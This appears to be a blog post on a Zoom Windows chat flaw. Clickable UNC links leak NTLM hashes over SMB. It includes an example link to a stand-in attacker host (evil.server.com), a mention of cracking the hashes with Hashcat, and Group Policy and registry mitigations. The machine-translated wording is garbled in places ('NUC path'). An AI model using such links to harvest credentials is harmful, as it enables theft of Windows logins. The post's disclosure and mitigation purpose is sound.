1) Recently, the Zoom client for Windows has revealed a security vulnerability vulnerable to NUC path injection attacks. As an audio and video conference application, Zoom also allows users to communicate with each other by sending text messages on the chat interface. However, foreign media Bleeping Computer pointed out that an attacker could use the vulnerability of the chat module to steal the Windows login credentials of the user who clicked the relevant link.
2) When sending a chat message, all sent URLs will be converted so that other members of the group can click and then open the webpage in the default browser.
> However, security researcher @undercodeTesting found that the Zoom client turned the Windows network UNC path into a clickable link in the chat message.
> both the regular URL and the NUC path (\\ evil.server.com \ images \ cat.jpg) are converted into clickable links in the chat message
3) f the user clicks the UNC path link, Windows will attempt to connect to the remote site using the SMB file sharing protocol to open the cat.jpg file in the remote path.
By default, Windows will send the user's login name and NTLM password hash, but a less experienced attacker can use a free tool like Hashcat to do the reverse.
4) Security researcher Matthew Hickey (@ HackerFantastic) found that it can be successfully injected in Zoom and can be quickly cracked with the help of current civilian GPUs and CPUs.
In addition to stealing Windows login credentials, Hickey also revealed to Bleeping Computer that by clicking on the link, UNC injection is also suitable for starting programs on the local computer (such as the CMD command prompt).
5) Fortunately, Windows will prompt you whether to allow the program to run before it is executed. To plug this vulnerability, Zoom must prevent the UNC path translation feature of the Windows client (block some clickable hyperlinks).
It is reported that Hickey has sent a notice to Zoom official on Twitter about the security breach, but it is not clear what action the company has taken.
6) Security-conscious customers can restrict NTLM communication to remote servers through Group Policy before the official patch release (refer to the following operations):
Computer Configuration-> Windows Settings-> Security Settings-> Local Policies-> Security Options-> Network Security: Restrict NTLM-> NTLM traffic to remote servers (then all configured to deny).
7)Note that if you configure the above Group Policy on a computer that has joined the relevant domain, you may encounter problems when trying to access the share.
For Windows 10 Home users who do not have access to Group Policy settings, you can also use the Registry Editor to complete the relevant restrictions (dword is set to 2):
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ MSV1_0] "RestrictSendingNTLMTraffic" = dword: 00000002
8) To create this key correctly, Windows users remember to launch Registry Editor as an administrator.
If in the future it is necessary to restore the default Windows behavior of sending NTLM credentials, simply delete the corresponding RestrictSendingNTLMTraffic key.
WRITTEN BY UNDERCODE
Enjoy! Follow us for more...
No comments:
Post a Comment